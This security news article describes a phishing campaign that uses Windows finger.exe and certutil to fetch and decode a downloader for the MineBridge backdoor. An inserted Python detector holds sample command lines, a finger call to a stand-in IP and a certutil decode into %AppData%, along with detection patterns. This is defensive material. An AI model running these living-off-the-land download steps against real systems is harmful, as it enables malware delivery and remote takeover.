Hackers Use Windows Finger Command to Download Malware

Cybercriminals are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims' devices.

The Finger command is a utility that originated on Linux/Unix operating systems; it lets a user, from their own machine, obtain a list of users on a remote computer or information about a specific remote user. Windows also ships a finger.exe command that performs the same function. The syntax is finger [user]@[remote_host].

Security researcher Kirk Sayre discovered a phishing campaign that used the Finger command to download the MineBridge backdoor. During the campaign, attackers send phishing emails with malicious Word documents disguised as a job seeker's resume. When the user clicks the "Allow Editing" or "Allow Content" buttons, a password-protected macro is launched to download the MineBridge malware.

The macro uses the Finger command to download a Base64-encoded "certificate" from a remote server. The certificate is in fact a base64-encoded malware downloader executable. It is decoded with certutil.exe, saved as %AppData%\vUCooUr.exe, and then executed.
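As an added example (not from the article or the researcher's write-up), the following Python detector correlates the three stages described above, finger.exe execution, certutil -decode into %AppData%, and execution of a binary from %AppData%, across process-creation records from the same host. The Sysmon-style record layout, host names, paths and sample events are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
# Constructed Sysmon-style process-creation records (hypothetical, not from the
# article): (UTC timestamp, host, parent image, image, command line).
SAMPLE_EVENTS = [
    ("2021-01-15T09:00:01", "ws01", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\finger.exe", "finger user@203.0.113.10"),
    ("2021-01-15T09:00:03", "ws01", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\certutil.exe",
     r"certutil -decode C:\Users\u\AppData\Roaming\c.txt C:\Users\u\AppData\Roaming\vUCooUr.exe"),
    ("2021-01-15T09:00:05", "ws01", r"C:\Windows\System32\cmd.exe",
     r"C:\Users\u\AppData\Roaming\vUCooUr.exe", r"C:\Users\u\AppData\Roaming\vUCooUr.exe"),
    # Benign activity on another host: a plain finger lookup and a certutil store query.
    ("2021-01-15T10:12:00", "ws02", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\finger.exe", "finger admin@unixhost.corp.example"),
    ("2021-01-15T10:30:00", "ws02", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\certutil.exe", "certutil -store My"),
]

APPDATA = re.compile(r"\\AppData\\", re.IGNORECASE)

def stage_of(image, cmdline):
    """Map one process-creation record to a stage of the chain, or None."""
    name = image.rsplit("\\", 1)[-1].lower()
    if name == "finger.exe":
        return "finger_download"          # payload fetched over finger (TCP/79)
    if name == "certutil.exe" and "-decode" in cmdline.lower() and APPDATA.search(cmdline):
        return "certutil_decode_appdata"  # base64 "certificate" decoded into %AppData%
    if name.endswith(".exe") and APPDATA.search(image):
        return "exec_from_appdata"        # dropped binary launched from %AppData%
    return None

def find_chains(events, window=timedelta(minutes=5)):
    """Return {host: stages} where finger -> certutil -decode -> AppData exec occur in order within `window`."""
    by_host = {}
    for ts, host, _parent, image, cmd in sorted(events):
        stage = stage_of(image, cmd)
        if stage:
            by_host.setdefault(host, []).append((datetime.fromisoformat(ts), stage))
    hits = {}
    for host, seq in by_host.items():
        for i, (t0, s0) in enumerate(seq):
            if s0 != "finger_download":
                continue
            later = [s for t, s in seq[i + 1:] if t - t0 <= window]
            if "certutil_decode_appdata" in later and \
               "exec_from_appdata" in later[later.index("certutil_decode_appdata") + 1:]:
                hits[host] = [s0] + later
    return hits
```

A lone finger lookup or certutil run (host ws02 in the sample) does not alert; only the full ordered chain on one host within the window does. Feed `find_chains` Sysmon Event ID 1 records in the same tuple shape and tune `window` to the environment.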

Once launched, the downloader fetches the TeamViewer executable and uses DLL hijacking to make it load the malicious MineBridge library. With MineBridge loaded, remote attackers gain full access to the computer and can eavesdrop on the victim through the infected device's microphone, as well as perform other malicious actions.
